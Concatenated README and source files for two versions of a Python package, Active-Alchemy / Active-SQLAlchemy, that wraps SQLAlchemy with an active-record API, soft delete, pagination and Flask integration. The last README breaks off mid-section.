db = ActiveAlchemy("mysql+pymysql://user:password@host:port/dbname")
---
Active-Alchemy also provides access to all the SQLAlchemy
functions from the ``sqlalchemy`` and ``sqlalchemy.orm`` modules.
So you can declare models like the following examples:
### Create a Model
To start, create a model class and extends it with db.Model
# mymodel.py
from active_alchemy import ActiveAlchemy
db = ActiveAlchemy("sqlite://")
class MyModel(db.Model):
name = db.Column(db.String(25))
is_live = db.Column(db.Boolean, default=False)
# Put at the end of the model module to auto create all models
db.create_all()
- Upon creation of the table, db.Model will add the following columns: ``id``, ``created_at``, ``updated_at``, ``is_deleted``, ``deleted_at``
- It does automatic table naming (if no table name is already defined using the ``__tablename__`` property)
by using the class name. So, for example, a ``User`` model gets a table named ``user``, and ``TodoList`` becomes ``todo_list``.
The name will not be pluralized.
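For example (a minimal sketch of the naming behaviour described above; the class names are illustrative, and the ``__tablename__`` override is the standard SQLAlchemy mechanism):
    class TodoList(db.Model):
        title = db.Column(db.String(100))
        # -> stored in the table "todo_list"
    class Inventory(db.Model):
        __tablename__ = "stock_items"  # explicit name takes precedence
        sku = db.Column(db.String(25))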
---
## Models: *db.Model*
**db.Model** extends your model with helpers that turn your model into an active record like model. But underneath, it still uses the ``db.session``
**db.Model** also adds a few preset columns on the table:
``id``: The primary key
``created_at``: Datetime. It contains the creation date of the record
``updated_at``: Datetime. It is updated whenever the record is updated.
``deleted_at``: Datetime. Contains the datetime the record was soft-deleted.
``is_deleted``: Boolean. A flag to set if record is soft-deleted or not
**-- About Soft Delete --**
By definition, soft-delete marks a record as deleted so it doesn't get queried, but it still exists in the database. To actually delete the record itself, a hard delete must apply.
By default, when a record is deleted, **Active-Alchemy** actually sets ``is_deleted`` to True and excludes it from being queried, and ``deleted_at`` is also set. But this happens only when using the method ``db.Model.delete()``.
When a record is soft-deleted, you can also undelete a record by doing: ``db.Model.delete(False)``
Now, to completely delete off the table, ``db.Model.delete(hard_delete=True)``
**-- Querying with *db.Model.query()* --**
Due to the fact that **Active-Alchemy** has soft-delete, to query a model without the soft-deleted records, you must query your model by using the ``all(*args, **kwargs)`` which returns a db.session.query object for you to apply filter on etc.
**-- db.BaseModel --**
By default ``db.Model`` adds several preset columns on the table, if you don't want to have them in your model, you can use instead ``db.BaseModel``, which still give you access to the methods to query your model.
``BaseModel`` by default assumes that your primary key is ``id``, but it
class MyExistingModel(db.BaseModel):
__tablename__ = "my_old_table"
__primary_key__ = "my_pk_id"
my_pk_id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String)
...
---
### db.Model Methods Description
#### query(\*args, \*\*kwargs)
To start querying the DB and returns a ``db.session.query`` object to filter or apply more conditions.
for user in User.query():
print(user.login)
By default `query()` will show only all non-soft-delete records. To display both deleted and non deleted items, add the arg: ``include_deleted=True``
for user in User.query(include_deleted=True):
print(user.login)
To select columns...
for user in User.query(User.name.distinct(), User.location):
print(user.login)
To use with filter...
all = User
.query(User.name.distinct, User.location)
.order_by(User.updated_at.desc())
.filter(User.location == "Charlotte")
#### get(id)
Get one record by id. By default it will query only a record that is not soft-deleted
id = 1234
user = User.get(id)
print(user.id)
print(user.login)
To query a record that has been soft deleted, just set the argument ``include_deleted=True``
id = 234
user = User.get(id, include_deleted=True)
#### create(\*\*kwargs)
To create/insert new record. Same as __init__, but just a shortcut to it.
record = User.create(login='abc', passw_hash='hash', profile_id=123)
print (record.login) # -> abc
or you can use the __init__ with save()
record = User(login='abc', passw_hash='hash', profile_id=123).save()
print (record.login) # -> abc
or
record = User(login='abc', passw_hash='hash', profile_id=123)
record.save()
print (record.login) # -> abc
#### update(\*\*kwargs)
Update an existing record
record = User.get(124)
record.update(login='new_login')
print (record.login) # -> new_login
#### delete()
To soft delete a record. ``is_deleted`` will be set to True and ``deleted_at`` datetime will be set
record = User.get(124)
record.delete()
print (record.is_deleted) # -> True
To soft **UNdelete** a record. ``is_deleted`` will be set to False and ``deleted_at`` datetime will be None
record = User.get(124)
record.delete(delete=False)
print (record.is_deleted) # -> False
To HARD delete a record. The record will be deleted completely
record = User.get(124)
record.delete(hard_delete=True)
#### save()
A shortcut to ``session.add`` + ``session.commit()``
record = User.get(124)
record.login = "Another one"
record.save()
---
#### Method Chaining
For convenience, some method chaining are available
user = User(name="Mardix", location="Charlotte").save()
User.get(12345).update(location="Atlanta")
User.get(345).delete().delete(False).update(location="St. Louis")
---
#### Aggegated selects
class Product(db.Model):
name = db.Column(db.String(250))
price = db.Column(db.Numeric)
price_label = db.func.sum(Product.price).label('price')
results = Product.query(price_label)
---
## With Web Application
In a web application you need to call ``db.session.remove()`` after each response, and ``db.session.rollback()`` if an error occurs. However, if you are using Flask or other framework that uses the `after_request` and ``on_exception`` decorators, these bindings it is done automatically.
For example using Flask, you can do:
app = Flask(__name__)
db = ActiveAlchemy('sqlite://', app=app)
or
db = ActiveAlchemy()
app = Flask(__name__)
db.init_app(app)
### More examples
#### Many databases, one web app
app = Flask(__name__)
db1 = ActiveAlchemy(URI1, app)
db2 = ActiveAlchemy(URI2, app)
#### Many web apps, one database
db = ActiveAlchemy(URI1)
app1 = Flask(__name__)
app2 = Flask(__name__)
db.init_app(app1)
db.init_app(app2)
---
## Pagination
All the results can be easily paginated
users = User.paginate(page=2, per_page=20)
print(list(users)) # [User(21), User(22), User(23), ... , User(40)]
The paginator object it's an iterable that returns only the results for that page, so you use it in your templates in the same way than the original result:
{% for item in paginated_items %}
<li>{{ item.name }}</li>
{% endfor %}
Rendering the pages
Below your results is common that you want it to render the list of pages.
The ``paginator.pages`` property is an iterator that returns the page numbers, but sometimes not all of them: if there are more than 11 pages, the result will be one of these, depending of what is the current page:
Skipped page numbers are represented as ``None``.
How many items are displayed can be controlled calling ``paginator.iter_pages`` instead.
This is one way how you could render such a pagination in your templates:
{% macro pagination(paginator, endpoint=None, class_='pagination') %}
{% if not endpoint %}
{% set endpoint = request.endpoint %}
{% endif %}
{% if "page" in kwargs %}
{% do kwargs.pop("page") %}
{% endif %}
<nav>
<ul class="{{ class_ }}">
{%- if paginator.has_prev %}
<li><a href="{{ url_for(endpoint, page=paginator.prev_page_number, **kwargs) }}"
rel="me prev"><span aria-hidden="true">«</span></a></li>
{% else %}
<li class="disabled"><span><span aria-hidden="true">«</span></span></li>
{%- endif %}
{%- for page in paginator.pages %}
{% if page %}
{% if page != paginator.page %}
<li><a href="{{ url_for(endpoint, page=page, **kwargs) }}"
rel="me">{{ page }}</a></li>
{% else %}
<li class="active"><span>{{ page }}</span></li>
{% endif %}
{% else %}
<li><span class=ellipsis>…</span></li>
{% endif %}
{%- endfor %}
{%- if paginator.has_next %}
<li><a href="{{ url_for(endpoint, page=paginator.next_page_number, **kwargs) }}"
rel="me next">»</a></li>
{% else %}
<li class="disabled"><span aria-hidden="true">»</span></li>
{%- endif %}
</ul>
</nav>
{% endmacro %}
______
#### Credits:
[SQLAlchemy](http://www.sqlalchemy.org/)
[Flask-SQLAlchemy](https://pythonhosted.org/Flask-SQLAlchemy)
[SQLAlchemy-Wrapper](https://github.com/lucuma/sqlalchemy-wrapper)
[Paginator](https://github.com/mardix/paginator.py)
[Arrow](http://crsmithdev.com/arrow/)
[SQLAlchemy-Utils](https://sqlalchemy-utils.readthedocs.io)
---
copyright: 2015-2016
license: MIT, see LICENSE for more details.
| Active-Alchemy | /Active-Alchemy-1.1.0.tar.gz/Active-Alchemy-1.1.0/README.md | README.md |
NAME = "Active-Alchemy"
# ------------------------------------------------------------------------------
import threading
import json
import datetime
import sqlalchemy
from sqlalchemy import *
from sqlalchemy.orm import scoped_session, sessionmaker, Query
from sqlalchemy.engine.url import make_url
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.schema import MetaData
from paginator import Paginator
import inflection
import sqlalchemy_utils as sa_utils
import arrow
DEFAULT_PER_PAGE = 10
utcnow = arrow.utcnow
def _create_scoped_session(db, query_cls):
session = sessionmaker(autoflush=True, autocommit=False,
bind=db.engine, query_cls=query_cls)
return scoped_session(session)
def _tablemaker(db):
def make_sa_table(*args, **kwargs):
if len(args) > 1 and isinstance(args[1], db.Column):
args = (args[0], db.metadata) + args[1:]
kwargs.setdefault('bind_key', None)
info = kwargs.pop('info', None) or {}
info.setdefault('bind_key', None)
kwargs['info'] = info
return sqlalchemy.Table(*args, **kwargs)
return make_sa_table
def _include_sqlalchemy(db):
for module in sqlalchemy, sqlalchemy.orm:
for key in module.__all__:
if not hasattr(db, key):
setattr(db, key, getattr(module, key))
db.Table = _tablemaker(db)
db.event = sqlalchemy.event
db.utils = sa_utils
db.arrow = arrow
db.utcnow = utcnow
db.SADateTime = db.DateTime
db.DateTime = sa_utils.ArrowType
db.JSONType = sa_utils.JSONType
db.EmailType = sa_utils.EmailType
class BaseQuery(Query):
def get_or_error(self, uid, error):
"""Like :meth:`get` but raises an error if not found instead of
returning `None`.
"""
rv = self.get(uid)
if rv is None:
if isinstance(error, Exception):
raise error
return error()
return rv
def first_or_error(self, error):
"""Like :meth:`first` but raises an error if not found instead of
returning `None`.
"""
rv = self.first()
if rv is None:
if isinstance(error, Exception):
raise error
return error()
return rv
def paginate(self, **kwargs):
"""Paginate this results.
Returns an :class:`Paginator` object.
"""
return Paginator(self, **kwargs)
class ModelTableNameDescriptor(object):
"""
Create the table name if it doesn't exist.
"""
def __get__(self, obj, type):
tablename = type.__dict__.get('__tablename__')
if not tablename:
tablename = inflection.underscore(type.__name__)
setattr(type, '__tablename__', tablename)
return tablename
class EngineConnector(object):
def __init__(self, sa_obj):
self._sa_obj = sa_obj
self._engine = None
self._connected_for = None
self._lock = threading.Lock()
def get_engine(self):
with self._lock:
uri = self._sa_obj.uri
info = self._sa_obj.info
options = self._sa_obj.options
echo = options.get('echo')
if (uri, echo) == self._connected_for:
return self._engine
self._engine = engine = sqlalchemy.create_engine(info, **options)
self._connected_for = (uri, echo)
return engine
class BaseModel(object):
"""
Baseclass for custom user models.
"""
__tablename__ = ModelTableNameDescriptor()
__primary_key__ = "id" # String
def __iter__(self):
"""Returns an iterable that supports .next()
so we can do dict(sa_instance).
"""
for k in self.__dict__.keys():
if not k.startswith('_'):
yield (k, getattr(self, k))
def __repr__(self):
return '<%s>' % self.__class__.__name__
def to_dict(self):
"""
Return an entity as dict
:returns dict:
"""
return {c.name: getattr(self, c.name) for c in self.__table__.columns}
def to_json(self):
"""
Convert the entity to JSON
:returns str:
"""
data = {}
for k, v in self.to_dict().items():
if isinstance(v, (datetime.datetime, sa_utils.ArrowType, arrow.Arrow)):
v = v.isoformat()
data[k] = v
return json.dumps(data)
@classmethod
def get(cls, pk):
"""
Select entry by its primary key. It must be define as
__primary_key__ (string)
"""
return cls._query(cls).filter(getattr(cls, cls.__primary_key__) == pk).first()
@classmethod
def create(cls, **kwargs):
"""
To create a new record
:returns object: The new record
"""
record = cls(**kwargs).save()
return record
def update(self, **kwargs):
"""
Update an entry
"""
for k, v in kwargs.items():
setattr(self, k, v)
self.save()
return self
@classmethod
def query(cls, *args):
"""
:returns query:
"""
if not args:
query = cls._query(cls)
else:
query = cls._query(*args)
return query
def save(self):
"""
Shortcut to add and save + rollback
"""
try:
self.db.add(self)
self.db.commit()
return self
except Exception as e:
self.db.rollback()
raise
def delete(self, delete=True, hard_delete=False):
"""
Soft delete a record
:param delete: Bool - To soft-delete/soft-undelete a record
:param hard_delete: Bool - *** Not applicable under BaseModel
"""
try:
self.db.session.delete(self)
return self.db.commit()
except Exception as e:
self.db.rollback()
raise
class Model(BaseModel):
"""
Model create
"""
id = Column(Integer, primary_key=True)
created_at = Column(sa_utils.ArrowType, default=utcnow)
updated_at = Column(sa_utils.ArrowType, default=utcnow, onupdate=utcnow)
is_deleted = Column(Boolean, default=False, index=True)
deleted_at = Column(sa_utils.ArrowType, default=None)
@classmethod
def query(cls, *args, **kwargs):
"""
:returns query:
:**kwargs:
- include_deleted bool: True To filter in deleted records.
By default it is set to False
"""
if not args:
query = cls._query(cls)
else:
query = cls._query(*args)
if "include_deleted" not in kwargs or kwargs["include_deleted"] is False:
query = query.filter(cls.is_deleted != True)
return query
@classmethod
def get(cls, id, include_deleted=False):
"""
Select entry by id
:param id: The id of the entry
:param include_deleted: It should not query deleted record. Set to True to get all
"""
return cls.query(include_deleted=include_deleted)\
.filter(cls.id == id)\
.first()
def delete(self, delete=True, hard_delete=False):
"""
Soft delete a record
:param delete: Bool - To soft-delete/soft-undelete a record
:param hard_delete: Bool - If true it will completely delete the record
"""
# Hard delete
if hard_delete:
try:
self.db.session.delete(self)
return self.db.commit()
except:
self.db.rollback()
raise
else:
data = {
"is_deleted": delete,
"deleted_at": utcnow() if delete else None
}
self.update(**data)
return self
class ActiveAlchemy(object):
"""This class is used to instantiate a SQLAlchemy connection to
a database.
db = ActiveAlchemy(_uri_to_database_)
The class also provides access to all the SQLAlchemy
functions from the :mod:`sqlalchemy` and :mod:`sqlalchemy.orm` modules.
So you can declare models like this::
class User(db.Model):
login = db.Column(db.String(80), unique=True)
passw_hash = db.Column(db.String(80))
In a web application you need to call `db.session.remove()`
after each response, and `db.session.rollback()` if an error occurs.
If your application object has a `after_request` and `on_exception
decorators, just pass that object at creation::
app = Flask(__name__)
db = ActiveAlchemy('sqlite://', app=app)
or later::
db = ActiveAlchemy()
app = Flask(__name__)
db.init_app(app)
.. admonition:: Check types carefully
Don't perform type or `isinstance` checks against `db.Table`, which
emulates `Table` behavior but is not a class. `db.Table` exposes the
`Table` interface, but is a function which allows omission of metadata.
"""
def __init__(self, uri='sqlite://',
app=None,
echo=False,
pool_size=None,
pool_timeout=None,
pool_recycle=None,
convert_unicode=True,
query_cls=BaseQuery):
self.uri = uri
self.info = make_url(uri)
self.options = self._cleanup_options(
echo=echo,
pool_size=pool_size,
pool_timeout=pool_timeout,
pool_recycle=pool_recycle,
convert_unicode=convert_unicode,
)
self.connector = None
self._engine_lock = threading.Lock()
self.session = _create_scoped_session(self, query_cls=query_cls)
self.Model = declarative_base(cls=Model, name='Model')
self.BaseModel = declarative_base(cls=BaseModel, name='BaseModel')
self.Model.db, self.BaseModel.db = self, self
self.Model._query, self.BaseModel._query = self.session.query, self.session.query
if app is not None:
self.init_app(app)
_include_sqlalchemy(self)
def _cleanup_options(self, **kwargs):
options = dict([
(key, val)
for key, val in kwargs.items()
if val is not None
])
return self._apply_driver_hacks(options)
def _apply_driver_hacks(self, options):
if "mysql" in self.info.drivername:
self.info.query.setdefault('charset', 'utf8')
options.setdefault('pool_size', 10)
options.setdefault('pool_recycle', 7200)
elif self.info.drivername == 'sqlite':
no_pool = options.get('pool_size') == 0
memory_based = self.info.database in (None, '', ':memory:')
if memory_based and no_pool:
raise ValueError(
'SQLite in-memory database with an empty queue'
' (pool_size = 0) is not possible due to data loss.'
)
return options
def init_app(self, app):
"""This callback can be used to initialize an application for the
use with this database setup. In a web application or a multithreaded
environment, never use a database without initialize it first,
or connections will leak.
"""
if not hasattr(app, 'databases'):
app.databases = []
if isinstance(app.databases, list):
if self in app.databases:
return
app.databases.append(self)
def shutdown(response=None):
self.session.remove()
return response
def rollback(error=None):
try:
self.session.rollback()
except Exception:
pass
self.set_flask_hooks(app, shutdown, rollback)
def set_flask_hooks(self, app, shutdown, rollback):
if hasattr(app, 'after_request'):
app.after_request(shutdown)
if hasattr(app, 'on_exception'):
app.on_exception(rollback)
@property
def engine(self):
"""Gives access to the engine. """
with self._engine_lock:
connector = self.connector
if connector is None:
connector = EngineConnector(self)
self.connector = connector
return connector.get_engine()
@property
def metadata(self):
"""Proxy for Model.metadata"""
return self.Model.metadata
@property
def query(self):
"""Proxy for session.query"""
return self.session.query
def add(self, *args, **kwargs):
"""Proxy for session.add"""
return self.session.add(*args, **kwargs)
def flush(self, *args, **kwargs):
"""Proxy for session.flush"""
return self.session.flush(*args, **kwargs)
def commit(self):
"""Proxy for session.commit"""
return self.session.commit()
def rollback(self):
"""Proxy for session.rollback"""
return self.session.rollback()
def create_all(self):
"""Creates all tables. """
self.Model.metadata.create_all(bind=self.engine)
def drop_all(self):
"""Drops all tables. """
self.Model.metadata.drop_all(bind=self.engine)
def reflect(self, meta=None):
"""Reflects tables from the database. """
meta = meta or MetaData()
meta.reflect(bind=self.engine)
return meta
def __repr__(self):
return "<SQLAlchemy('{0}')>".format(self.uri) | Active-Alchemy | /Active-Alchemy-1.1.0.tar.gz/Active-Alchemy-1.1.0/active_alchemy.py | active_alchemy.py |
NAME = "Active-SQLAlchemy"
# ------------------------------------------------------------------------------
import sys
import re
import threading
import json
import datetime
import sqlalchemy
from sqlalchemy import *
from sqlalchemy.orm import scoped_session, sessionmaker, Query
from sqlalchemy.engine.url import make_url
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.schema import MetaData
from math import ceil
from paginator import Paginator
# _compat
PY2 = sys.version_info[0] == 2
if PY2:
string_type = (basestring, )
xrange = xrange
else:
string_type = str
xrange = range
DEFAULT_PER_PAGE = 10
def _create_scoped_session(db, query_cls):
session = sessionmaker(autoflush=True, autocommit=False,
bind=db.engine, query_cls=query_cls)
return scoped_session(session)
def _tablemaker(db):
def make_sa_table(*args, **kwargs):
if len(args) > 1 and isinstance(args[1], db.Column):
args = (args[0], db.metadata) + args[1:]
kwargs.setdefault('bind_key', None)
info = kwargs.pop('info', None) or {}
info.setdefault('bind_key', None)
kwargs['info'] = info
return sqlalchemy.Table(*args, **kwargs)
return make_sa_table
def _include_sqlalchemy(db):
for module in sqlalchemy, sqlalchemy.orm:
for key in module.__all__:
if not hasattr(db, key):
setattr(db, key, getattr(module, key))
db.Table = _tablemaker(db)
db.event = sqlalchemy.event
def _sanitize_page_number(page):
if page == 'last':
return page
if isinstance(page, string_type) and page.isdigit():
page = int(page)
if isinstance(page, int) and (page > 0):
return page
return 1
def _underscore(word):
"""
Make an underscored, lowercase form from the expression in the string.
_underscore('DeviceType') -> device_type
"""
word = re.sub(r"([A-Z]+)([A-Z][a-z])", r'\1_\2', word)
word = re.sub(r"([a-z\d])([A-Z])", r'\1_\2', word)
word = word.replace("-", "_")
return word.lower()
class BaseQuery(Query):
def get_or_error(self, uid, error):
"""Like :meth:`get` but raises an error if not found instead of
returning `None`.
"""
rv = self.get(uid)
if rv is None:
if isinstance(error, Exception):
raise error
return error()
return rv
def first_or_error(self, error):
"""Like :meth:`first` but raises an error if not found instead of
returning `None`.
"""
rv = self.first()
if rv is None:
if isinstance(error, Exception):
raise error
return error()
return rv
def paginate(self, **kwargs):
"""Paginate this results.
Returns an :class:`Paginator` object.
"""
return Paginator(self, **kwargs)
class ModelTableNameDescriptor(object):
"""
Create the table name if it doesn't exist.
"""
def __get__(self, obj, type):
tablename = type.__dict__.get('__tablename__')
if not tablename:
tablename = _underscore(type.__name__)
setattr(type, '__tablename__', tablename)
return tablename
class EngineConnector(object):
def __init__(self, sa_obj):
self._sa_obj = sa_obj
self._engine = None
self._connected_for = None
self._lock = threading.Lock()
def get_engine(self):
with self._lock:
uri = self._sa_obj.uri
info = self._sa_obj.info
options = self._sa_obj.options
echo = options.get('echo')
if (uri, echo) == self._connected_for:
return self._engine
self._engine = engine = sqlalchemy.create_engine(info, **options)
self._connected_for = (uri, echo)
return engine
class IDMixin(object):
"""
A mixin to add an id
"""
id = Column(Integer, primary_key=True)
class BaseModel(object):
"""
Baseclass for custom user models.
"""
__tablename__ = ModelTableNameDescriptor()
def __iter__(self):
"""Returns an iterable that supports .next()
so we can do dict(sa_instance).
"""
for k in self.__dict__.keys():
if not k.startswith('_'):
yield (k, getattr(self, k))
def __repr__(self):
return '<%s>' % self.__class__.__name__
def to_dict(self):
"""
Return an entity as dict
:returns dict:
"""
return {c.name: getattr(self, c.name) for c in self.__table__.columns}
def to_json(self):
"""
Convert the entity to JSON
:returns str:
"""
data = {}
for k, v in self.to_dict().items():
if isinstance(v, datetime.datetime):
v = v.isoformat()
data[k] = v
return json.dumps(data)
@classmethod
def get(cls, id):
"""
Select entry by id
:param id: The id of the entry
"""
return cls.query(cls).filter(cls.id == id).first()
@classmethod
def create(cls, **kwargs):
"""
To create a new record
:returns object: The new record
"""
record = cls(**kwargs).save()
return record
def update(self, **kwargs):
"""
Update an entry
"""
for k, v in kwargs.items():
setattr(self, k, v)
self.save()
return self
@classmethod
def all(cls, *args):
"""
:returns query:
"""
if not args:
query = cls.query(cls)
else:
query = cls.query(*args)
return query
def save(self):
"""
Shortcut to add and save + rollback
"""
try:
self.db.add(self)
self.db.commit()
return self
except Exception as e:
self.db.rollback()
raise
def delete(self, delete=True, hard_delete=False):
"""
Soft delete a record
:param delete: Bool - To soft-delete/soft-undelete a record
:param hard_delete: Bool - *** Not applicable under BaseModel
"""
try:
self.db.session.delete(self)
return self.db.commit()
except Exception as e:
self.db.rollback()
raise
class Model(IDMixin, BaseModel):
"""
Model create
"""
created_at = Column(DateTime, default=func.now())
updated_at = Column(DateTime, default=func.now(), onupdate=func.now())
is_deleted = Column(Boolean, default=False, index=True)
deleted_at = Column(DateTime, default=None)
@classmethod
def all(cls, *args, **kwargs):
"""
:returns query:
:**kwargs:
- include_deleted bool: True To filter in deleted records.
By default it is set to False
"""
if not args:
query = cls.query(cls)
else:
query = cls.query(*args)
if "include_deleted" not in kwargs or kwargs["include_deleted"] is False:
query = query.filter(cls.is_deleted != True)
return query
@classmethod
def get(cls, id, include_deleted=False):
"""
Select entry by id
:param id: The id of the entry
:param include_deleted: It should not query deleted record. Set to True to get all
"""
return cls.all(include_deleted=include_deleted)\
.filter(cls.id == id)\
.first()
def delete(self, delete=True, hard_delete=False):
"""
Soft delete a record
:param delete: Bool - To soft-delete/soft-undelete a record
:param hard_delete: Bool - If true it will completely delete the record
"""
# Hard delete
if hard_delete:
try:
self.db.session.delete(self)
return self.db.commit()
except:
self.db.rollback()
raise
else:
data = {
"is_deleted": delete,
"deleted_at": func.now() if delete else None
}
self.update(**data)
return self
class SQLAlchemy(object):
"""This class is used to instantiate a SQLAlchemy connection to
a database.
db = SQLAlchemy(_uri_to_database_)
The class also provides access to all the SQLAlchemy
functions from the :mod:`sqlalchemy` and :mod:`sqlalchemy.orm` modules.
So you can declare models like this::
class User(db.Model):
login = db.Column(db.String(80), unique=True)
passw_hash = db.Column(db.String(80))
In a web application you need to call `db.session.remove()`
after each response, and `db.session.rollback()` if an error occurs.
If your application object has a `after_request` and `on_exception
decorators, just pass that object at creation::
app = Flask(__name__)
db = SQLAlchemy('sqlite://', app=app)
or later::
db = SQLAlchemy()
app = Flask(__name__)
db.init_app(app)
.. admonition:: Check types carefully
Don't perform type or `isinstance` checks against `db.Table`, which
emulates `Table` behavior but is not a class. `db.Table` exposes the
`Table` interface, but is a function which allows omission of metadata.
"""
def __init__(self, uri='sqlite://',
app=None,
echo=False,
pool_size=None,
pool_timeout=None,
pool_recycle=None,
convert_unicode=True,
query_cls=BaseQuery):
self.uri = uri
self.info = make_url(uri)
self.options = self._cleanup_options(
echo=echo,
pool_size=pool_size,
pool_timeout=pool_timeout,
pool_recycle=pool_recycle,
convert_unicode=convert_unicode,
)
self.connector = None
self._engine_lock = threading.Lock()
self.session = _create_scoped_session(self, query_cls=query_cls)
self.Model = declarative_base(cls=Model, name='Model')
self.BaseModel = declarative_base(cls=BaseModel, name='BaseModel')
self.Model.db, self.BaseModel.db = self, self
self.Model.query, self.BaseModel.query = self.session.query, self.session.query
if app is not None:
self.init_app(app)
_include_sqlalchemy(self)
def _cleanup_options(self, **kwargs):
options = dict([
(key, val)
for key, val in kwargs.items()
if val is not None
])
return self._apply_driver_hacks(options)
def _apply_driver_hacks(self, options):
if "mysql" in self.info.drivername:
self.info.query.setdefault('charset', 'utf8')
options.setdefault('pool_size', 10)
options.setdefault('pool_recycle', 7200)
elif self.info.drivername == 'sqlite':
no_pool = options.get('pool_size') == 0
memory_based = self.info.database in (None, '', ':memory:')
if memory_based and no_pool:
raise ValueError(
'SQLite in-memory database with an empty queue'
' (pool_size = 0) is not possible due to data loss.'
)
return options
def init_app(self, app):
"""This callback can be used to initialize an application for the
use with this database setup. In a web application or a multithreaded
environment, never use a database without initialize it first,
or connections will leak.
"""
if not hasattr(app, 'databases'):
app.databases = []
if isinstance(app.databases, list):
if self in app.databases:
return
app.databases.append(self)
def shutdown(response=None):
self.session.remove()
return response
def rollback(error=None):
try:
self.session.rollback()
except Exception:
pass
self.set_flask_hooks(app, shutdown, rollback)
def set_flask_hooks(self, app, shutdown, rollback):
if hasattr(app, 'after_request'):
app.after_request(shutdown)
if hasattr(app, 'on_exception'):
app.on_exception(rollback)
@property
def engine(self):
"""Gives access to the engine. """
with self._engine_lock:
connector = self.connector
if connector is None:
connector = EngineConnector(self)
self.connector = connector
return connector.get_engine()
@property
def metadata(self):
"""Proxy for Model.metadata"""
return self.Model.metadata
@property
def query(self):
"""Proxy for session.query"""
return self.session.query
def add(self, *args, **kwargs):
"""Proxy for session.add"""
return self.session.add(*args, **kwargs)
def flush(self, *args, **kwargs):
"""Proxy for session.flush"""
return self.session.flush(*args, **kwargs)
def commit(self):
"""Proxy for session.commit"""
return self.session.commit()
def rollback(self):
"""Proxy for session.rollback"""
return self.session.rollback()
def create_all(self):
"""Creates all tables. """
self.Model.metadata.create_all(bind=self.engine)
self.BaseModel.metadata.create_all(bind=self.engine)
def drop_all(self):
"""Drops all tables. """
self.Model.metadata.drop_all(bind=self.engine)
self.BaseModel.metadata.drop_all(bind=self.engine)
def reflect(self, meta=None):
"""Reflects tables from the database. """
meta = meta or MetaData()
meta.reflect(bind=self.engine)
return meta
def __repr__(self):
return "<SQLAlchemy('{0}')>".format(self.uri) | Active-SQLAlchemy | /Active-SQLAlchemy-0.4.0.tar.gz/Active-SQLAlchemy-0.4.0/active_sqlalchemy.py | active_sqlalchemy.py |
#Active-SQLAlchemy
**Version 0.3.***
---
Active-SQLAlchemy is a framework agnostic wrapper for SQLAlchemy that makes it really easy
to use by implementing a simple active record like api, while it still uses the db.session underneath.
Inspired by Flask-SQLAlchemy.
Works with Python 2.6, 2.7, 3.3, 3.4 and pypy.
---
##Quick Overview:
####Create the model
from active_sqlalchemy import SQLAlchemy
db = SQLAlchemy('sqlite://')
class User(db.Model):
name = db.Column(db.String(25))
location = db.Column(db.String(50), default="USA")
last_access = db.Column(db.Datetime)
####Create new record
user = User.create(name="Mardix", location="Moon")
# or
user = User(name="Mardix", location="Moon").save()
####Get all records
all = User.all()
####Get a record by id
user = User.get(1234)
####Update record
user = User.get(1234)
if user:
user.update(location="Neptune")
####Soft Delete a record
user = User.get(1234)
if user:
user.delete()
####Query Records
users = User.all(User.location.distinct())
for user in users:
...
####Query with filter
all = User.all().filter(User.location == "USA")
for user in users:
...
##How to use
### Install
pip install active_sqlalchemy
### Create a connection
The SQLAlchemy class is used to instantiate a SQLAlchemy connection to
a database.
from active_sqlalchemy import SQLAlchemy
db = SQLAlchemy(dialect+driver://username:password@host:port/database)
#### Databases Drivers & DB Connection examples
Active-SQLAlchemy comes with a `PyMySQL` and `PG8000` as drivers for MySQL
and PostgreSQL respectively, because they are in pure Python. But you can use
other drivers for better performance. `SQLite` is already built in Python.
**SQLite:**
from active_sqlalchemy import SQLAlchemy
db = SQLAlchemy("sqlite://") # in memory
# or
db = SQLAlchemy("sqlite:///foo.db") # DB file
**PostgreSql:**
from active_sqlalchemy import SQLAlchemy
db = SQLAlchemy("postgresql+pg8000://user:password@host:port/dbname")
**PyMySQL:**
from active_sqlalchemy import SQLAlchemy
db = SQLAlchemy("mysql+pymysql://user:password@host:port/dbname")
---
Active-SQLAlchemy also provides access to all the SQLAlchemy
functions from the ``sqlalchemy`` and ``sqlalchemy.orm`` modules.
So you can declare models like the following examples:
### Create a Model
To start, create a model class and extends it with db.Model
# mymodel.py
from active_sqlachemy import SQLAlchemy
db = SQLAlchemy("sqlite://")
class MyModel(db.Model):
name = db.Column(db.String(25))
is_live = db.Column(db.Boolean, default=False)
# Put at the end of the model module to auto create all models
db.create_all()
- Upon creation of the table, db.Model will add the following columns: ``id``, ``created_at``, ``upated_at``, ``is_deleted``, ``deleted_at``
- It does an automatic table naming (if no table name is already defined using the ``__tablename__`` property)
by using the class name. So, for example, a ``User`` model gets a table named ``user``, ``TodoList`` becomes ``todo_list``
The name will not be plurialized.
---
## Models: *db.Model*
**db.Model** extends your model with helpers that turn your model into an active record like model. But underneath, it still uses the ``db.session``
**db.Model** also adds a few preset columns on the table:
``id``: The primary key
``created_at``: Datetime. It contains the creation date of the record
``updated_at``: Datetime. It is updated whenever the record is updated.
``deleted_at``: Datetime. Contains the datetime the record was soft-deleted.
``is_deleted``: Boolean. A flag to set if record is soft-deleted or not
**-- About Soft Delete --**
By definition, soft-delete marks a record as deleted so it doesn't get queried, but it still exists in the database. To actually delete the record itself, a hard delete must apply.
By default, when a record is deleted, **Active-SQLAlchemy** actually sets ``is_deleted`` to True and excludes it from being queried, and ``deleted_at`` is also set. But this happens only when using the method ``db.Model.delete()``.
When a record is soft-deleted, you can also undelete a record by doing: ``db.Model.delete(False)``
Now, to totally delete off the table, ``db.Model.delete(hard_delete=True)``
**-- Querying with *db.Model.all()* --**
Due to the fact that **Active-SQLAlchemy** has soft-delete, to query a model without the soft-deleted records, you must query your model by using the ``all(*args, **kwargs)`` which returns a db.session.query object for you to apply filter on etc.
**-- db.BaseModel --**
By default ``db.Model`` adds several preset columns on the table, if you don't want to have them in your model, you can use instead ``db.BaseModel``, which still give you access to the methods to query your model.
---
### db.Model Methods Description
**all(\*args, \*\*kwargs)**
Returns a ``db.session.query`` object to filter or apply more conditions.
all = User.all()
for user in all:
print(user.login)
By default all() will show only all non-soft-delete records. To display both deleted and non deleted items, add the arg: ``include_deleted=True``
all = User.all(include_deleted=True)
for user in all:
print(user.login)
Use all to select columns etc
all = User.all(User.name.distinct(), User.location)
for user in all:
print(user.login)
Use all for complete filter
